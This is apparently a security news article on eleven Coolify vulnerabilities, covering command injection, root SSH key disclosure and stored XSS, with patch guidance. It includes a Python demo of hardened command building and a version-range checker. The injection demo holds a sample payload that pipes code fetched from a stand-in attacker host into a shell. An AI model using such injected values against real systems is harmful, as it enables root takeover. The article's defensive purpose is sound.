A recently published security disclosure details 11 vulnerabilities in the Coolify open-source self-hosting platform, most of them rated critical, that together put tens of thousands of self-hosted servers at risk of complete takeover. The majority of the flaws carry the maximum CVSS score of 10.0. The common thread is command injection: an authenticated user, in some cases one with only minimal privileges, can get arbitrary commands executed on the host server as root. With an estimated 52,890 Coolify instances reachable from the internet, concentrated in Germany, the United States and France, the potential for widespread compromise is substantial, and the episode is a reminder that self-hosted infrastructure needs the same patching discipline and vigilance as anything else an organisation runs.
The Anatomy of a Compromise
Command injection is the dominant pattern in the disclosure. Untrusted input reaches a shell command that Coolify runs on the host, and because the platform performs its management operations with root privileges, whatever the input contains runs as root. The flaws sit in core functionality reachable by an authenticated user. Database management is one cluster: the handling of PostgreSQL initialization scripts (CVE-2025-66211), database backups (CVE-2025-66209) and database imports (CVE-2025-66210) all accept attacker-controlled values that end up on a command line. A user permitted to manage databases can therefore craft an input that the system executes as root, which is a direct line to full server control. The Dynamic Proxy Configuration (CVE-2025-66212) and File Storage Directory Mount (CVE-2025-66213) features carry the same class of flaw, reachable by users holding the corresponding management roles.
A second group of critical issues stems from insufficient sanitization of user-supplied configuration data, which is the platform's everyday input. Malicious commands embedded in otherwise ordinary configuration files and form fields are executed as root. CVE-2025-64419 lets an attacker plant shell commands in a docker-compose.yaml file that run when the service is deployed or updated. Others target the git integration, where commands can be injected through git source input fields (CVE-2025-64424, CVE-2025-59157) or through Docker Compose directives (CVE-2025-59156). What makes these particularly dangerous is the privilege required: standard, "member-level" users can trigger them, so an ordinary account becomes a low-effort path from regular user to root on the entire host.
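The injection pattern behind the database-management and configuration flaws above, as an added example constructed for this article (it is not Coolify's code; Coolify is a PHP/Laravel application, but the shape of the bug is language-independent, and Python is used here so the example runs stand-alone). It shows a backup command built by interpolating a user-supplied database name into a shell string, next to two hardened forms, plus a small tokenizer that counts how many commands /bin/sh would actually run. The container name, database name, payload and backup path are all made up.

```python
"""Added example: the command-injection pattern behind the database-management CVEs.

Constructed illustration, not Coolify's code. The container name, database
name, payload and backup path are invented for the demonstration.
"""
import re
import shlex
from typing import List

# Unquoted PostgreSQL identifiers: letters, digits, underscore, 63 bytes max.
# Treating this as the only acceptable shape for a database name is an
# assumed policy for the example.
IDENTIFIER_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,62}$")

# Tokens that start a new simple command in POSIX sh. Redirections (> <) are
# deliberately not listed: they change where output goes, not what runs.
CONTROL_OPERATORS = {";", "|", "||", "&", "&&"}


def backup_command_vulnerable(container: str, db_name: str) -> str:
    """Splice the user-controlled database name straight into a shell string.

    If this string is later handed to `sh -c` (locally, or over SSH to the
    managed host as root), everything after the first ';' or '|' in db_name
    runs as its own command.
    """
    return (f"docker exec {container} pg_dump -U postgres {db_name} "
            f"> /backups/{db_name}.sql")


def backup_command_quoted(container: str, db_name: str) -> str:
    """Same command, but every interpolated value is shell-quoted.

    shlex.quote wraps the value in single quotes (escaping any embedded
    single quote), so metacharacters become literal characters of one word.
    Use this form only when a shell string is genuinely unavoidable.
    """
    q = shlex.quote
    return (f"docker exec {q(container)} pg_dump -U postgres {q(db_name)} "
            f"> {q('/backups/' + db_name + '.sql')}")


def backup_argv(container: str, db_name: str) -> List[str]:
    """Preferred form: validate the inputs, then build an argv list.

    An argv list passed to subprocess.run without shell=True never goes
    through a shell, so there is no string to break out of. Redirection is
    not available that way; the caller writes stdout to the file itself.
    """
    for label, value in (("container", container), ("database", db_name)):
        if not IDENTIFIER_RE.fullmatch(value):
            raise ValueError(f"refusing {label} name {value!r}")
    return ["docker", "exec", container, "pg_dump", "-U", "postgres", db_name]


def shell_command_count(cmd: str) -> int:
    """Count the simple commands /bin/sh would run for `cmd`.

    shlex with punctuation_chars=True tokenises like the shell: runs of
    ;|& come out as their own tokens, while quoted text stays one word.
    """
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return 1 + sum(1 for token in lex if token in CONTROL_OPERATORS)


if __name__ == "__main__":
    # Constructed malicious "database name" for the demonstration.
    payload = "mydb; curl attacker.example | sh"
    print(shell_command_count(backup_command_vulnerable("db1", payload)))  # 5
    print(shell_command_count(backup_command_quoted("db1", payload)))      # 1
    try:
        backup_argv("db1", payload)
    except ValueError as exc:
        print(exc)
```

Quoting alone stops the breakout but still routes the value through a shell; validating against an identifier allowlist and passing an argv list removes the shell from the path entirely, which is the fix to prefer. The same reasoning applies to compose file contents, git URLs and mount paths that end up on a command line.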
Beyond Direct Command Execution
Not every flaw in the disclosure needs command execution. An information disclosure vulnerability (CVE-2025-64420) lets a low-privileged authenticated user read the private SSH key of the root user on the Coolify instance. With that key, an attacker can open an ordinary, fully authenticated SSH session as root and keep it, with no further exploit required. Because nothing anomalous is executed through Coolify itself, monitoring that watches for suspicious child processes sees only a legitimate-looking login; the session does still appear in the sshd logs as a publickey authentication for root. Upgrading does not revoke a key that has already been read, so any instance that ran an affected build should have its root SSH key rotated. Separately, a stored cross-site scripting (XSS) vulnerability (CVE-2025-59158) allows an authenticated user to inject a script during project creation. The script lies dormant until an administrator acts on the project, for example by deleting it, and then executes in the administrator's browser, where it can hijack the session or drive further compromise.
A Call for Immediate Remediation
The vulnerabilities affect Coolify 4.0.0 beta builds up to and including 4.0.0-beta.450. Fixes shipped across several releases, 4.0.0-beta.420.7, 4.0.0-beta.445 and 4.0.0-beta.451, which together address most of the critical issues; the patch status of two CVEs was still unconfirmed at the time of the report. There were no public reports of exploitation in the wild, but the severity ratings and the simplicity of several exploitation paths made preventive action essential. Administrators should verify their instance version and move to the latest patched release without delay. With tens of thousands of instances exposed online, restricting access to the Coolify dashboard (VPN or IP allowlisting) also shrinks the pool of attackers able to obtain the authenticated foothold that every one of these flaws requires. The episode is a reminder to the self-hosting community that the convenience and control of platforms like Coolify come with the obligation of diligent security maintenance.
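A version check an administrator can apply to the version string the Coolify dashboard reports, added here as an example and not part of Coolify. It encodes only what the report states: builds up to and including 4.0.0-beta.450 are inside the affected range, so a build at 4.0.0-beta.420.7 or 4.0.0-beta.445 carries some of the fixes but not the full set. Comparing the strings as text gets this wrong ("4.0.0-beta.99" sorts after "4.0.0-beta.450"), so the components are parsed to integers first. Where the version string is read from is not assumed.

```python
"""Added example: is a reported Coolify version inside the disclosed affected range?

Constructed helper, not part of Coolify. It encodes one fact from the report:
4.0.0 beta builds up to and including 4.0.0-beta.450 are affected. Where the
version string comes from (dashboard, API) is not assumed here.
"""
import re
from typing import Tuple

LAST_AFFECTED = "4.0.0-beta.450"

# Accepts "4.0.0", "4.0.0-beta.450" and hotfix builds like "4.0.0-beta.420.7",
# with or without a leading "v". Anything else is rejected rather than guessed.
_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-beta\.(\d+)(?:\.(\d+))?)?$")

# Sentinel for a build without a "-beta.N" component: a final release sorts
# after every beta of the same major.minor.patch, as in semantic versioning.
_RELEASE_SENTINEL = 10**9


def parse_version(version: str) -> Tuple[int, int, int, int, int]:
    """Return (major, minor, patch, beta, hotfix) as integers.

    Integer components compare element by element, which is what string
    comparison gets wrong: "450" < "99" as text, 450 > 99 as numbers.
    """
    match = _VERSION_RE.match(version.strip())
    if not match:
        raise ValueError(f"unrecognised Coolify version string: {version!r}")
    major, minor, patch, beta, hotfix = match.groups()
    beta_num = int(beta) if beta is not None else _RELEASE_SENTINEL
    return (int(major), int(minor), int(patch), beta_num, int(hotfix or 0))


def is_affected(version: str) -> bool:
    """True when the build is at or below the last affected build.

    Intermediate fix releases (4.0.0-beta.420.7, 4.0.0-beta.445) still return
    True: they contain some fixes, but not the complete set the report covers.
    """
    return parse_version(version) <= parse_version(LAST_AFFECTED)


if __name__ == "__main__":
    for v in ("4.0.0-beta.99", "4.0.0-beta.420.7", "4.0.0-beta.450", "4.0.0-beta.451"):
        print(f"{v:>18}  affected={is_affected(v)}")
```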
